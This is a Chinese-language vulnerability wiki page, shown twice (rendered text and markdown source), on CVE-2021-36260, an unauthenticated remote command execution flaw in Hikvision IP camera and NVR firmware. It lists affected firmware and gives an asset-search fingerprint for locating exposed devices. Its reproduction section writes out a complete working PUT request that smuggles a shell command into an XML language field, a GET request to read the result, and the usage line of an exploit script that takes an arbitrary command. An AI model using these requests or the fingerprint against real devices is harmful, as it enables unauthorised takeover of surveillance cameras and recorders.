fofamini-wiki

登录白背景

源码

海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

一、漏洞简介

海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞（CVE-2021-36260）。漏洞影响IP摄像头和NVR设备固件，漏洞是因为对输入参数检验不充分，未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备，即可实现远程命令执行。

二、影响版本

易受攻击的网络摄像机固件。
| 产品类型 | 影响版本 |

IPC_E0	IPC_E0_CN_STD_5.4.6_180112
IPC_E1	未知
IPC_E2	IPC_E2_EN_STD_5.5.52_180620
IPC_E4	未知
IPC_E6	IPCK_E6_EN_STD_5.5.100_200226
IPC_E7	IPCK_E7_EN_STD_5.5.120_200604
IPC_G3	IPC_G3_EN_STD_5.5.160_210416
IPC_G5	IPC_G5_EN_STD_5.5.113_210317
IPC_H1	IPC_H1_EN_STD_5.4.61_181204
IPC_H5	IPCP_H5_EN_STD_5.5.85_201120
IPC_H8	Factory installed firmware mid 2021
IPC_R2	IPC_R2_EN_STD_V5.4.81_180203

易受攻击的 PTZ 摄像机固件。

产品类型	影响版本
IPD_E7	IPDEX_E7_EN_STD_5.6.30_210526
IPD_G3	IPDES_G3_EN_STD_5.5.42_210106
IPD_H5	IPD_H5_EN_STD_5.5.41_200911
IPD_H7	IPD_H7_EN_STD_5.5.40_200721
IPD_H8	IPD_H8_EN_STD_5.7.1_210619

易受攻击的旧固件。

产品类型	影响版本
IPC_R7	5.4.x
IPD_R7
IPC_G0
IPC_H3
IPD_H3

三、资产测绘

hunterheader="671-1e0-587ec4a1"
特征

四、漏洞复现

执行命令，写入到文件中

PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 79

<?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/x)</language>

获取命令执行结果

GET /x HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8

利用脚本
HIKVISION_CVE-2021-36260_rce.py

python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al"

原文: https://www.yuque.com/xiaokp7/ocvun2/ph37hx0zftramet9

# 海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)

# 一、漏洞简介
海康威视IP摄像机/NVR设备固件中发现一个未认证的远程代码执行漏洞（CVE-2021-36260）。漏洞影响IP摄像头和NVR设备固件，漏洞是因为对输入参数检验不充分，未经身份验证的攻击者通过构造恶意命令请求包发送到受影响设备，即可实现远程命令执行。

# 二、影响版本

- 易受攻击的网络摄像机固件。
| **产品类型** | **影响版本** |
| --- | --- |
| IPC_E0 | IPC_E0_CN_STD_5.4.6_180112 |
| IPC_E1 | 未知 |
| IPC_E2 | IPC_E2_EN_STD_5.5.52_180620 |
| IPC_E4 | 未知 |
| IPC_E6 | IPCK_E6_EN_STD_5.5.100_200226 |
| IPC_E7 | IPCK_E7_EN_STD_5.5.120_200604 |
| IPC_G3 | IPC_G3_EN_STD_5.5.160_210416 |
| IPC_G5 | IPC_G5_EN_STD_5.5.113_210317 |
| IPC_H1 | IPC_H1_EN_STD_5.4.61_181204 |
| IPC_H5 | IPCP_H5_EN_STD_5.5.85_201120 |
| IPC_H8 | Factory installed firmware mid 2021 |
| IPC_R2 | IPC_R2_EN_STD_V5.4.81_180203 |

易受攻击的 PTZ 摄像机固件。

| **产品类型** | **影响版本** |
| --- | --- |
| IPD_E7 | IPDEX_E7_EN_STD_5.6.30_210526 |
| IPD_G3 | IPDES_G3_EN_STD_5.5.42_210106 |
| IPD_H5 | IPD_H5_EN_STD_5.5.41_200911 |
| IPD_H7 | IPD_H7_EN_STD_5.5.40_200721 |
| IPD_H8 | IPD_H8_EN_STD_5.7.1_210619 |

易受攻击的旧固件。

| **产品类型** | **影响版本** |
| --- | --- |
| IPC_R7 | 5.4.x |
| IPD_R7 |  |
| IPC_G0 |  |
| IPC_H3 |  |
| IPD_H3 |  |

# 三、资产测绘

- hunter`header="671-1e0-587ec4a1"`
- 特征

![image.png](./img/BRUyZKZO0-k6Y5uv/1700231990825-56e1158c-4918-4b47-a71e-0af9fcbfc673-810101.png)

# 四、漏洞复现

1. 执行命令，写入到文件中
```
PUT /SDK/webLanguage HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
Content-Length: 79

<?xml version="1.0" encoding="UTF-8"?><language>$(ifconfig>webLib/x)</language>
```
![image.png](./img/BRUyZKZO0-k6Y5uv/1700232070419-9804d121-8b87-42e2-bb05-45566b0d57e5-479577.png)

2. 获取命令执行结果
```
GET /x HTTP/1.1
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.9,sv;q=0.8
```
![image.png](./img/BRUyZKZO0-k6Y5uv/1700232088177-c92f2bcb-4980-4685-bbdf-38be1ec84437-612572.png)
利用脚本
[HIKVISION_CVE-2021-36260_rce.py](https://www.yuque.com/attachments/yuque/0/2024/py/1622799/1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fpy%2F1622799%2F1709222237457-6ffbdfa8-06b2-47c4-b0a5-0576e9fd5cda.py%22%2C%22name%22%3A%22HIKVISION_CVE-2021-36260_rce.py%22%2C%22size%22%3A12014%2C%22ext%22%3A%22py%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u6129e448-a8a4-4986-a5bf-2294d4d8718%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fx-python-script%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22u2d527ce3%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
```
python HIKVISION_CVE-2021-36260_rce.py --rhost xx.xx.xx.xx --rport 8098 --cmd "ls -al"
```
![image.png](./img/BRUyZKZO0-k6Y5uv/1700232671938-598342d8-9715-45cc-8ecf-477e359015aa-966203.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ph37hx0zftramet9>